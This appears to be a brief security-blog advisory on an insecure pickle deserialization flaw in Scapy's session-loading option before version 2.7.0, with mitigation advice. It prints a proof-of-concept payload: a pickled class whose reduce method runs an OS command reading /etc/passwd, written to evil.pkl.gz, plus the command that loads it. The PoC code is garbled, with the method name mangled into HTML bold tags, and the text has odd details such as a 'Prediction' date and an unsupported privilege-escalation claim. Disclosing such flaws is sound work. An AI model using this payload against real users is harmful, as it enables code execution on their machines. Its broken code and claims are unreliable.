Listen to this Post
The vulnerability exploits the unsafe deserialization of session files in Scapy versions prior to 2.7.0. When a user loads a session file using the `-s` command-line option, the `load_session` function in `main.py` is triggered. This function uses Python’s `pickle.load()` on the provided gzip-compressed file without any validation. The pickle module is inherently unsafe because it can instantiate any arbitrary object. An attacker can create a malicious payload by defining a class with a `__reduce__` method that returns a callable and its arguments, such as an OS command. When this payload is compressed into a `.pkl.gz` file and loaded via ./run_scapy -s ./evil.pkl.gz, the `__reduce__` method executes immediately during deserialization, leading to arbitrary code execution with the privileges of the user running Scapy.
Platform: Scapy
Version: <2.7.0
Vulnerability : Insecure Deserialization
Severity: Medium
date: 2024
Prediction: 2024-02-15
What Undercode Say:
./run_scapy -s ./evil.pkl.gz
import pickle, os, gzip
class RCE:
def <strong>reduce</strong>(self):
return (os.system, ("cat /etc/passwd",))
payload = gzip.compress(pickle.dumps(RCE()))
with open("evil.pkl.gz", "wb") as f:
f.write(payload)
How Exploit:
Attacker creates a malicious `.pkl.gz` file containing serialized code. The victim is tricked into loading this file with the Scapy `-s` option. Upon loading, the embedded code executes automatically.
Protection from this CVE
Upgrade to Scapy v2.7.0. Avoid using the `-s` session option. Never load untrusted session files.
Impact:
Arbitrary Code Execution. Local Privilege Escalation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
